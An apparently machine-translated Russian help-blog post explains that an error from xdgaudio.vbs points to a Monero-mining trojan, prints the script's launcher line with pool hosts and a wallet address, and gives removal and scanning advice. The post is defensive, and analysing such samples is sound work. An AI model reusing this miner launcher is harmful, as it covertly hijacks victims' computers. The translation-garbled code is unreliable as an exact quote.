Если в вашей системе появляется следующее сообщение об ошибке, связанное с файлом xdgaudio.vbs, скорее всего, ваш компьютер заражен.
Скрипт: C: windows xdgaudio.vbs
Строка: 3
Char: 1
Ошибка: система не может найти указанный файл.
Код объявления: 80070002
Источник: (null)
При редактировании с помощью Блокнота сценарий может содержать строки, подобные приведенным ниже:
Dim WShell Set WShell = CreateObject ('WScript.Shell') WShell.Run 'wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o прослойка + TCP: //xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o прослойка + TCP: //mine.moneropool.com: 3333 -u -p 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv х», 0 Установите WShell = Nothing
Это определенно выглядит как троян CPU / Cryptocurrency Miner, который не только замедляет работу вашего компьютера, но также может представлять угрозу безопасности. Файлы сценария c: windows xdgaudio.vbs и c: windows servicecrsssr.vbs следует удалить. Этого не достаточно. Выполните тщательное сканирование с помощью защиты от вредоносных программ Malwarebytes, а также просканируйте с помощью антивирусного программного обеспечения, которое вы используете.
Подробные инструкции по удалению такого троянца-майнера см. В руководстве по malwaretips.com. Как удалить троян CPU Miner из Windows (Справочное руководство по вирусам) .
Одна небольшая просьба: если вам понравился этот пост, поделитесь им?
Одна «крошечная» публикация от вас серьезно помогла бы росту этого блога. Несколько отличных предложений:- Приколи это!
- Поделитесь этим в своем любимом блоге + Facebook, Reddit
- Твитнуть!